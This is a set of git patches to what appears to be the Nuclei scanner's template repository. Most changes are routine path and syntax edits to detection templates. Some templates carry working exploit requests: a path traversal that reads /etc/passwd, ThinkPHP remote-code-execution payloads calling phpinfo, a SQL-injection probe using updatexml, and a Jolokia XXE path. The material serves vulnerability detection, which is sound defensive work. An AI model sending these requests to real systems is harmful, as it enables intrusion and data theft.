diff --git a/default-logins/solarwinds/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml
index a661a39615..4714290947 100644
--- a/default-logins/solarwinds/solarwinds-default-admin.yaml
+++ b/default-logins/solarwinds/solarwinds-default-admin.yaml
@@ -16,7 +16,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
-      - "{{BaseURL}}:17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS"
+
     headers:
       Authorization: "Basic YWRtaW46"
     matchers-condition: and
diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml
index 7038f3640f..8d5ad08cb3 100755
--- a/exposed-panels/activemq-panel.yaml
+++ b/exposed-panels/activemq-panel.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml
index f4693188bc..33d01d09c8 100755
--- a/exposed-panels/airflow-exposure.yaml
+++ b/exposed-panels/airflow-exposure.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
       - '{{BaseURL}}/admin/'
     matchers:
       - type: word
diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml
index aa2121f3d5..a55efd2371 100644
--- a/exposed-panels/ambari-exposure.yaml
+++ b/exposed-panels/ambari-exposure.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml
index 0ef45ced7f..b5e5ab05fb 100644
--- a/exposed-panels/ansible-tower-exposure.yaml
+++ b/exposed-panels/ansible-tower-exposure.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml
index 00135ebf18..7afd969b7f 100755
--- a/exposed-panels/couchdb-fauxton.yaml
+++ b/exposed-panels/couchdb-fauxton.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml
index b0cc838eed..218b432e50 100755
--- a/exposed-panels/druid-console-exposure.yaml
+++ b/exposed-panels/druid-console-exposure.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml
index e8cee03f5c..e2a4c4cb21 100755
--- a/exposed-panels/flink-exposure.yaml
+++ b/exposed-panels/flink-exposure.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml
index 687c26364e..a3a54516fa 100755
--- a/exposed-panels/kafka-connect-ui.yaml
+++ b/exposed-panels/kafka-connect-ui.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml
index 326b562280..3468f21397 100755
--- a/exposed-panels/kafka-monitoring.yaml
+++ b/exposed-panels/kafka-monitoring.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml
index 288fffdaa1..d54d091f33 100755
--- a/exposed-panels/kafka-topics-ui.yaml
+++ b/exposed-panels/kafka-topics-ui.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/public-tomcat-manager.yaml b/exposed-panels/public-tomcat-manager.yaml
index 3989655c1f..a373203e11 100644
--- a/exposed-panels/public-tomcat-manager.yaml
+++ b/exposed-panels/public-tomcat-manager.yaml
@@ -9,7 +9,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/manager/html'
-      - '{{BaseURL}}:8080/manager/html'
+
     matchers-condition: and
     matchers:
       - type: word
diff --git a/exposed-panels/rabbitmq-dashboard.yaml b/exposed-panels/rabbitmq-dashboard.yaml
index fd42463637..b9add7a446 100644
--- a/exposed-panels/rabbitmq-dashboard.yaml
+++ b/exposed-panels/rabbitmq-dashboard.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}'
-      - "{{BaseURL}}:15672"
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml
index 4ba0f94f82..896022430f 100755
--- a/exposed-panels/rocketmq-console-exposure.yaml
+++ b/exposed-panels/rocketmq-console-exposure.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/exposed-panels/sap-hana-xsengine-panel.yaml b/exposed-panels/sap-hana-xsengine-panel.yaml
index 88af3a92af..d61062ac70 100644
--- a/exposed-panels/sap-hana-xsengine-panel.yaml
+++ b/exposed-panels/sap-hana-xsengine-panel.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/sap/hana/xs/formLogin/login.html"
-      - "{{BaseURL}}:8000/sap/hana/xs/formLogin/login.html"
     redirects: true
     matchers:
       - type: word
diff --git a/exposed-panels/traefik-dashboard.yaml b/exposed-panels/traefik-dashboard.yaml
index de5351f73e..ac0b10ec90 100644
--- a/exposed-panels/traefik-dashboard.yaml
+++ b/exposed-panels/traefik-dashboard.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/dashboard/"
-      - "{{BaseURL}}:8080/dashboard/"
     matchers:
       - type: word
         words:
diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml
index 70aab59bc4..fec6389cab 100644
--- a/exposures/logs/struts-debug-mode.yaml
+++ b/exposures/logs/struts-debug-mode.yaml
@@ -8,7 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     matchers:
       - type: word
         words:
diff --git a/misconfiguration/aws-redirect.yaml b/misconfiguration/aws-redirect.yaml
index 911ca6a4dd..1a5939194f 100644
--- a/misconfiguration/aws-redirect.yaml
+++ b/misconfiguration/aws-redirect.yaml
@@ -9,7 +9,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
+
     redirects: false
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/django-debug-detect.yaml b/misconfiguration/django-debug-detect.yaml
index 938fab92e2..3b65a87847 100644
--- a/misconfiguration/django-debug-detect.yaml
+++ b/misconfiguration/django-debug-detect.yaml
@@ -9,12 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}:8000"
-      - "{{BaseURL}}:8080"
-      - "{{BaseURL}}:8001"
-      - "{{BaseURL}}:9080"
-      - "{{BaseURL}}:8443"
-      - "{{BaseURL}}:8060"
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/elasticsearch.yaml b/misconfiguration/elasticsearch.yaml
index 07682ad878..cb1d61c356 100644
--- a/misconfiguration/elasticsearch.yaml
+++ b/misconfiguration/elasticsearch.yaml
@@ -9,9 +9,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/_cat/indices?v'
-      - '{{BaseURL}}:9200/_cat/indices?v'
       - '{{BaseURL}}/_all/_search'
-      - '{{BaseURL}}:9200/_all/_search'
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/exposed-kibana.yaml b/misconfiguration/exposed-kibana.yaml
index a6bd3e4c5d..c24fb67570 100644
--- a/misconfiguration/exposed-kibana.yaml
+++ b/misconfiguration/exposed-kibana.yaml
@@ -8,10 +8,8 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
-      - '{{BaseURL}}:5601/'
+      - '{{BaseURL}}'
       - '{{BaseURL}}/app/kibana/'
-      - '{{BaseURL}}:5601/app/kibana/'
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/kubernetes-pods.yaml b/misconfiguration/kubernetes-pods.yaml
index cd1f07ed29..29bc436cbc 100644
--- a/misconfiguration/kubernetes-pods.yaml
+++ b/misconfiguration/kubernetes-pods.yaml
@@ -12,7 +12,6 @@ requests:
     path:
       - '{{BaseURL}}/pods'
       - '{{BaseURL}}/api/v1/pods'
-      - '{{BaseURL}}:10250/pods'
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/manage-engine-ad-search.yaml b/misconfiguration/manage-engine-ad-search.yaml
index 67a157fdeb..a26478ea23 100644
--- a/misconfiguration/manage-engine-ad-search.yaml
+++ b/misconfiguration/manage-engine-ad-search.yaml
@@ -10,8 +10,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/ADSearch.cc?methodToCall=search"
-      - "{{BaseURL}}:8443/ADSearch.cc?methodToCall=search"
-      - "{{BaseURL}}:8080/ADSearch.cc?methodToCall=search"
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/springboot-detect.yaml b/misconfiguration/springboot-detect.yaml
index 83b1d2abf8..618cb05ae3 100644
--- a/misconfiguration/springboot-detect.yaml
+++ b/misconfiguration/springboot-detect.yaml
@@ -60,8 +60,6 @@ requests:
       - "{{BaseURL}}/hystrix.stream"
       - "{{BaseURL}}/jolokia"
       - "{{BaseURL}}/jolokia/list"
-      - "{{BaseURL}}:8090/jolokia"
-      - "{{BaseURL}}:8090/jolokia/list"
       - "{{BaseURL}}/loggers"
       - "{{BaseURL}}/management"
       - "{{BaseURL}}/mappings"
diff --git a/misconfiguration/symfony-debugmode.yaml b/misconfiguration/symfony-debugmode.yaml
index 1d004630a5..4524db03d7 100644
--- a/misconfiguration/symfony-debugmode.yaml
+++ b/misconfiguration/symfony-debugmode.yaml
@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/'
+      - '{{BaseURL}}'
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     matchers-condition: and
diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml
index b49881f30a..4db232a58f 100644
--- a/misconfiguration/unauthenticated-airflow.yaml
+++ b/misconfiguration/unauthenticated-airflow.yaml
@@ -9,11 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/admin/"
-      - "{{BaseURL}}:8080/admin/"
-      - "{{BaseURL}}:8000/admin/"
-      - "{{BaseURL}}:9000/admin/"
-      - "{{BaseURL}}:9090/admin/"
-      - "{{BaseURL}}:3000/admin/"
 
     matchers-condition: and
     matchers:
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml
index 9b4a19b866..0522fc067b 100644
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@@ -8,7 +8,6 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}:8123/"
       - "{{BaseURL}}"
     matchers:
       - type: word
diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml
index 0dfa77971d..c922719f06 100644
--- a/technologies/jolokia.yaml
+++ b/technologies/jolokia.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/jolokia/version'
-      - '{{BaseURL}}:8080/jolokia/version'
     matchers-condition: and
     matchers:
       - type: word
diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml
index dc13873ee8..136736d9fe 100644
--- a/technologies/liferay-portal-detect.yaml
+++ b/technologies/liferay-portal-detect.yaml
@@ -9,9 +9,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/api/jsonws'
-      - '{{BaseURL}}:8080/api/jsonws'
       - '{{BaseURL}}/api/jsonws/invoke'
-      - '{{BaseURL}}:8080/api/jsonws/invoke'
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     matchers:
diff --git a/technologies/prometheus-exposed-panel.yaml b/technologies/prometheus-exposed-panel.yaml
index 61e672a3ff..371360dff8 100644
--- a/technologies/prometheus-exposed-panel.yaml
+++ b/technologies/prometheus-exposed-panel.yaml
@@ -8,7 +8,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/graph'
-      - '{{BaseURL}}:9090/graph'
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     matchers:
diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml
index 1cd80a808f..6d290ac6f8 100644
--- a/technologies/weblogic-detect.yaml
+++ b/technologies/weblogic-detect.yaml
@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/console/login/LoginForm.jsp"
-      - "{{BaseURL}}:7001/console/login/LoginForm.jsp"
 
     matchers:
       - type: word
diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
index c72fac8331..2e4d2d841f 100644
--- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
+++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
@@ -9,7 +9,6 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
       - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
     matchers-condition: and
     matchers:

From 8d647ffbadabba8c19e2d9adb6c5e6613e40a7c7 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Thu, 14 Jan 2021 20:21:36 +0530
Subject: [PATCH 75/85] Update CVE-2020-5410.yaml

---
 cves/2020/CVE-2020-5410.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml
index 25452f8fcc..75acfbbe97 100644
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@@ -9,7 +9,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
-\    matchers-condition: and
+    matchers-condition: and
     matchers:
       - type: status
         status:

From 0c237549fed1e9aea2a7ee32804d9be9ecf3def7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Tommy=20M=C3=BChle?= <tommy.muehle@gmail.com>
Date: Fri, 15 Jan 2021 10:29:10 +0100
Subject: [PATCH 76/85] Add further path to composer-config.yaml

If the vendor directory is part of the web root you can also find the config in the provided path. Of course you've then also some more problems besides that ;)
---
 exposures/configs/composer-config.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml
index b3a9afeebb..8fe5d67e0a 100644
--- a/exposures/configs/composer-config.yaml
+++ b/exposures/configs/composer-config.yaml
@@ -11,6 +11,7 @@ requests:
       - "{{BaseURL}}/composer.json"
       - "{{BaseURL}}/composer.lock"
       - "{{BaseURL}}/.composer/composer.json"
+      - "{{BaseURL}}/vendor/composer/installed.json"
 
     matchers:
       - type: dsl
@@ -21,4 +22,4 @@ requests:
       - type: dsl
         name: composer.json
         dsl:
-          - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200"
\ No newline at end of file
+          - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200"

From f7b9ae5148e0082a150fe9402ee949ae1297f4a4 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Fri, 15 Jan 2021 21:00:35 +0530
Subject: [PATCH 77/85] updating exclude list

---
 .nuclei-ignore | 13 +------------
 1 file changed, 1 insertion(+), 12 deletions(-)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index d7c47164c6..1f30f3f2cc 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -25,15 +25,4 @@ helpers/
 miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
-workflows/
-
-# Adding older folder to avoid possilbe issue with nuclei ignore execution.
-misc/
-default-credentials/
-files/
-generic-detections/
-panels/
-payloads/
-security-misconfiguration/
-subdomain-takeover/
-tokens/
\ No newline at end of file
+workflows/
\ No newline at end of file

From 642480ecb813396e73a3109889362a2c15e82e7b Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Sat, 16 Jan 2021 15:02:41 +0000
Subject: [PATCH 78/85] Create lucee-detect.yaml

---
 technologies/lucee-detect.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 technologies/lucee-detect.yaml

diff --git a/technologies/lucee-detect.yaml b/technologies/lucee-detect.yaml
new file mode 100644
index 0000000000..5213f4acd0
--- /dev/null
+++ b/technologies/lucee-detect.yaml
@@ -0,0 +1,22 @@
+id: lucee-detect
+info:
+  name: Detect Lucee
+  author: geeknik
+  description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)X-Lucee-Version"
+          - "(?i)X-CB-Server: LUCEE"
+          - "(?i)X-IDG-Appserver: Lucee"
+        condition: or

From 1a6c4e7f33938718905bbb5403e3be5d7d59cd0a Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Sat, 16 Jan 2021 15:25:15 +0000
Subject: [PATCH 79/85] Update lucee-detect.yaml

---
 technologies/lucee-detect.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/technologies/lucee-detect.yaml b/technologies/lucee-detect.yaml
index 5213f4acd0..e4cd2663f7 100644
--- a/technologies/lucee-detect.yaml
+++ b/technologies/lucee-detect.yaml
@@ -10,7 +10,6 @@ requests:
     path:
       - "{{BaseURL}}"
 
-    matchers-condition: and
     matchers:
 
       - type: regex

From 4b13b7a485178d741aa08b105dc537051c4989bb Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Sat, 16 Jan 2021 15:29:01 +0000
Subject: [PATCH 80/85] Auto Update README [Sat Jan 16 15:29:01 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 662023612c..4ce6d72fc7 100644
--- a/README.md
+++ b/README.md
@@ -33,7 +33,7 @@ An overview of the nuclei template directory including number of templates assoc
 | exposed-tokens  | 9  | exposures        | 40      |
 | fuzzing         | 5           | helpers          | 3        |
 | miscellaneous   | 14     | misconfiguration | 37 |
-| takeovers       | 1         | technologies     | 43     |
+| takeovers       | 1         | technologies     | 44     |
 | vulnerabilities | 62 | workflows        | 16        |
 
 
@@ -455,6 +455,7 @@ An overview of the nuclei template directory including number of templates assoc
 │   ├── liferay-portal-detect.yaml
 │   ├── linkerd-badrule-detect.yaml
 │   ├── lotus-domino-version.yaml
+│   ├── lucee-detect.yaml
 │   ├── magmi-detect.yaml
 │   ├── mrtg-detect.yaml
 │   ├── netsweeper-webadmin-detect.yaml
@@ -573,7 +574,7 @@ An overview of the nuclei template directory including number of templates assoc
 
 </details>
 
-**53 directories, 473 files**.
+**53 directories, 474 files**.
 
 📖 Documentation
 -----

From 58ebf5903535a822ff9c29b2459573478e420331 Mon Sep 17 00:00:00 2001
From: parrot <parrot@localhost.localdomain>
Date: Tue, 19 Jan 2021 01:16:59 -0300
Subject: [PATCH 81/85] Added ThinkPHP templates and signature.

---
 technologies/tech-detect.yaml                 |  9 ++++++-
 vulnerabilities/thinkphp/thinkphp-2-rce.yaml  | 24 +++++++++++++++++
 .../thinkphp/thinkphp-5022-rce.yaml           | 24 +++++++++++++++++
 .../thinkphp/thinkphp-5023-rce.yaml           | 27 +++++++++++++++++++
 .../thinkphp-509-information-disclosure.yaml  | 24 +++++++++++++++++
 5 files changed, 107 insertions(+), 1 deletion(-)
 create mode 100755 vulnerabilities/thinkphp/thinkphp-2-rce.yaml
 create mode 100755 vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
 create mode 100755 vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
 create mode 100755 vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml

diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml
index 033288a3b9..626619380e 100644
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@@ -2746,4 +2746,11 @@ requests:
         name: monit
         part: header
         words:
-          - 'Server: monit'
\ No newline at end of file
+          - 'Server: monit'
+          
+      - type: word
+        name: thinkphp
+        words:
+          - "ThinkPHP"
+        part: header
+        
diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
new file mode 100755
index 0000000000..afa7ffce70
--- /dev/null
+++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
@@ -0,0 +1,24 @@
+id: thinkphp-2-rce
+
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
new file mode 100755
index 0000000000..a3b53096d2
--- /dev/null
+++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
@@ -0,0 +1,24 @@
+id: thinkphp-5022-rce
+
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
new file mode 100755
index 0000000000..d1a545672e
--- /dev/null
+++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
@@ -0,0 +1,27 @@
+id: thinkphp-5023-rce
+
+info:
+  name: ThinkPHP 5.0.23 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?s=captcha"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
new file mode 100755
index 0000000000..82ed0747f9
--- /dev/null
+++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
@@ -0,0 +1,24 @@
+id: thinkphp-509-information-disclosure
+
+info:
+  name: ThinkPHP 5.0.9 Information Disclosure
+  author: dr_set
+  severity: critical
+  description: Verbose SQL error message reveals sensitive information including database credentials.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "SQLSTATE"
+          - "XPATH syntax error"
+        condition: and
+      - type: status
+        status:
+          - 500

From 1a14ff8c44716bac964ed39a4414b120a8034cc9 Mon Sep 17 00:00:00 2001
From: PD-Team <8293321+bauthard@users.noreply.github.com>
Date: Tue, 19 Jan 2021 12:33:48 +0530
Subject: [PATCH 82/85] syntax update

---
 technologies/tech-detect.yaml                                | 5 ++---
 vulnerabilities/thinkphp/thinkphp-2-rce.yaml                 | 3 +--
 vulnerabilities/thinkphp/thinkphp-5022-rce.yaml              | 3 +--
 vulnerabilities/thinkphp/thinkphp-5023-rce.yaml              | 3 +--
 .../thinkphp/thinkphp-509-information-disclosure.yaml        | 5 ++---
 5 files changed, 7 insertions(+), 12 deletions(-)

diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml
index 626619380e..dcab4a8bff 100644
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@@ -2747,10 +2747,9 @@ requests:
         part: header
         words:
           - 'Server: monit'
-          
+
       - type: word
         name: thinkphp
         words:
           - "ThinkPHP"
-        part: header
-        
+        part: header
\ No newline at end of file
diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
index afa7ffce70..fed9db9cbf 100755
--- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
@@ -5,8 +5,7 @@ info:
   author: dr_set
   severity: critical
   description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
-  
-  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
 
 requests:
   - method: GET
diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
index a3b53096d2..3fde3a1ce7 100755
--- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
@@ -5,8 +5,7 @@ info:
   author: dr_set
   severity: critical
   description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
-  
-  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
 
 requests:
   - method: GET
diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
index d1a545672e..775c09b546 100755
--- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
@@ -5,8 +5,7 @@ info:
   author: dr_set
   severity: critical
   description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
-  
-  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
 
 requests:
   - method: POST
